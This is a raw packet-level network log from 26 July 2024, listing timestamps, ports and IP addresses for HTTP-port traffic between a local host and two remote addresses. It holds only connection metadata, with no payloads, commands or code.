Jul 26, 2024 12:57:52.257241964 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.257255077 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.257278919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.257291079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.257337093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.272584915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.272645950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.272846937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.272881985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.272900105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.272914886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.272931099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.272948980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.272962093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.272983074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.272996902 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.273019075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.273035049 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.273066998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.283910990 CEST	80	60840	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:52.283979893 CEST	60840	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.343877077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.343944073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.343952894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.343981028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.343996048 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344033003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344140053 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344173908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344189882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344212055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344238043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344249010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344258070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344299078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344424963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344475031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344566107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344600916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344618082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344650984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344713926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344746113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344770908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344791889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344795942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344829082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344842911 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344861984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344877005 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344894886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344921112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344928980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344959974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344960928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.344978094 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.344994068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345012903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345026970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345042944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345088005 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345508099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345558882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345560074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345609903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345695972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345727921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345751047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345761061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.345777988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.345807076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346074104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346107006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346129894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346138954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346152067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346170902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346184969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346204996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346218109 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346239090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346251011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346276045 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346287012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346326113 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346697092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346729994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346748114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346762896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346779108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346796989 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346811056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346829891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346843958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346862078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346879959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346894979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346908092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346929073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346945047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346961021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.346976042 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.346993923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347009897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347043037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347477913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347532988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347614050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347646952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347670078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347680092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347695112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347714901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347728014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347748041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347760916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347780943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347799063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347814083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347836018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347846985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347870111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347878933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.347896099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.347925901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348458052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348514080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348537922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348570108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348589897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348603010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348622084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348638058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348653078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348670959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348687887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348704100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348718882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348737955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348754883 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348771095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348793030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348804951 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.348817110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.348851919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.349939108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.349972963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.349997044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350004911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350022078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350038052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350053072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350070000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350086927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350101948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350116968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350135088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350148916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350167990 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350182056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350202084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350218058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350251913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350255013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350287914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350321054 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350323915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350347042 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350354910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350387096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350389004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350399971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350421906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350440979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350441933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350455046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350470066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350471020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350486040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350495100 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350502968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350543022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.350894928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.350946903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351025105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351041079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351056099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351069927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351070881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351085901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351094961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351102114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351116896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351130962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351133108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351147890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351155043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351176977 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351213932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351913929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351929903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351943970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351958036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351965904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.351974010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351989985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.351990938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.352004051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.352020025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.352032900 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.352035999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.352051973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.352060080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.352083921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.352118969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.373967886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374176979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.374197960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374216080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374254942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374259949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.374288082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.374289036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374315977 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.374322891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374341965 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.374356985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.374371052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.374404907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.398128033 CEST	60840	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.398595095 CEST	60841	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.404839039 CEST	80	60841	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:52.405035973 CEST	60841	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.405078888 CEST	60841	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.405426025 CEST	80	60840	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:52.405560017 CEST	60840	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.411673069 CEST	80	60841	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:52.439613104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439647913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439682007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439685106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.439714909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439716101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.439738035 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.439765930 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.439810991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439845085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439862013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.439889908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.439953089 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.439984083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440001965 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440016985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440035105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440049887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440072060 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440100908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440346003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440380096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440403938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440413952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440431118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440448999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440459967 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440501928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440540075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440572023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440594912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440606117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440618992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440639973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440659046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440673113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440691948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440706015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440723896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440737963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440757036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440788984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440859079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440911055 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.440920115 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.440972090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441016912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441049099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441071987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441096067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441257000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441292048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441315889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441323996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441342115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441359043 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441370964 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441406965 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441440105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441493988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441637039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441665888 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441694021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441698074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441720963 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441732883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441745996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441780090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441874027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441905975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441930056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441939116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441953897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.441972017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.441987991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442004919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442019939 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442037106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442049026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442070007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442086935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442101955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442120075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442133904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442153931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442167044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442188025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442200899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442239046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442260027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442665100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442697048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442714930 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442728996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.442739964 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.442760944 CEST	80	60836	198.46.178.145	192.168.2.6
